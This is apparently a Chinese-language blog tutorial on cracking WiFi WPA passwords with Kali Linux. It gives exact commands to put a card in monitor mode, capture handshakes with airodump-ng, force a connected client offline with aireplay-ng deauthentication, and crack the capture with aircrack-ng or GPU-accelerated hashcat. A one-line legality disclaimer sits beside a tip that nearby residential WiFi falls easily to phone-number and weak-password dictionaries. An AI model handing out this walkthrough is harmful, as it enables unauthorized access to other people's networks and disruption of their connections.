各位小伙伴大家好鴨,鴿了好幾天,今天突然發(fā)現(xiàn)一個比較好用的東西,下面聽我慢慢道來WIFI握手包破解握手包簡單理解就是發(fā)送指令與驗證指令俗稱密碼驗證加密方式hash(哈希算法)kali破解wifi密碼開始1、選擇合適的網(wǎng)卡,有些網(wǎng)卡kali識
各位小伙伴大家好鴨,鴿了好幾天,今天突然發(fā)現(xiàn)一個比較好用的東西,下面聽我慢慢道來
WIFI握手包破解
握手包簡單理解就是發(fā)送指令與驗證指令俗稱密碼驗證 加密方式hash(哈希算法)

kali破解wifi密碼
開始
1、選擇合適的網(wǎng)卡,有些網(wǎng)卡kali識別不了,我用的網(wǎng)卡信息
2、網(wǎng)卡開啟監(jiān)聽模式
3、查看監(jiān)聽模式是否開啟成功(網(wǎng)卡名稱變成wlan0mon說明已經(jīng)開啟成功)
4、輸入“airodump-ng wlan0mon”,掃描附近熱點信息,找到自己想要破解的熱點名稱后按下ctrl+c停止掃描(NEM-AL10是我自己用手機開啟的熱點,破解他人無線密碼是違法的,自己搭個熱點玩玩就行)
5、抓取握手包。命令格式“airodump-ng -c {CH} --bssid {BSSID} -w {要保存握手包的目錄}”輸入:airodump-ng -c 11 --bssid 3C:FA:43:7E:57:48 -w /home/ wlan0mon,當抓到握手包的時候箭頭處會顯示”handshake“字樣
6、可以看到現(xiàn)在抓不到握手包,是因為沒有客戶端與AP進行連接。但是我們看到了一個已連接的熱點,我們發(fā)送反認證包,讓其下線,然后改客戶端會重新嘗試連接熱點,然后我們就可以抓到握手包了。
新開一個終端窗口,命令格式為:aireplay-ng -0 {發(fā)送反認證包的個數(shù)} -a {BSSID} -c {強制下線的MAC地址(STATION下面的地址)} 無線網(wǎng)卡名稱
輸入“aireplay-ng -0 10 -a 3C:FA:43:7E:57:48 -c 30:10:B3:DC:9F:75 wlan0mon”,系統(tǒng)會下線,然后重新連接,然后我們就可以抓到握手包了。
7、按下ctrl+c停止抓包。進到/home目錄下查看握手包,其中"-01.cap"是我們一會兒破解要用到的數(shù)據(jù)包
8、使用aircrack-ng進行破解。命令格式:aircrack-ng -w {本地的字典文件(破解的關(guān)鍵)} {握手包}
輸入"aircrack-ng -w top3000.txt /home/-01.cap",由于握手包命名的特殊性,這里只能使用絕對路徑,可以改個名字就可以使用相對路徑了
字典啥的需要自備哦。小區(qū)附近的wifi用電話號碼和弱密碼成功概率極高
aircrack-ng優(yōu)缺點
較為簡單,上手即用,但詬病也比較大,在破解握手包時,CPU直接100%,啥事也干不成,對于雙系統(tǒng)的我,更是不敢使用,晚上睡覺前跑包,一晚上能跑完。
Hashcat
hashcat號稱世界上最快的密碼破解,世界上第一個和唯一的基于GPGPU規(guī)則引擎,免費多GPU(高達128個GPU),多哈希,多操作系統(tǒng)(Linux和Windows本地二進制文件),多平臺(OpenCL和CUDA支持),多算法,資源利用率低,基于字典攻擊,支持分布式破解等等。
其實關(guān)鍵就是可以調(diào)用GPU進行破解,速度一流,原來兩個小時40分鐘的包,GTX 920M 縮減成40分鐘。
但是在此之前,我們需要安裝一些東西,眾所周知,linux安裝GPU驅(qū)動,有點危險,弄不好就會翻車。
https://www.kali.org/docs/general-use/install-nvidia-drivers-on-kali-linux/
但是我們可以直接安裝 CUDA toolkit.
apt install -y ocl-icd-libopencl1 nvidia-driver nvidia-cuda-toolkit
一鍵安裝,絕不翻車。安裝好了過后,重啟一下。
nvidia-smi
hashcat -I
即可查看GPU信息
hashcat -b
進行算法測試,可以查看自己GPU的跑包的速度。
總體來說,跑的速度比CPU快的不知道多少倍,還可以拿linux玩玩其他的。
hashcat 跑包命令
hashcat -m 2500 *.hccapx 字典文件
注意:hccapx需要cap包轉(zhuǎn)化成hccapx包
轉(zhuǎn)化網(wǎng)址:https://hashcat.net/cap2hccapx/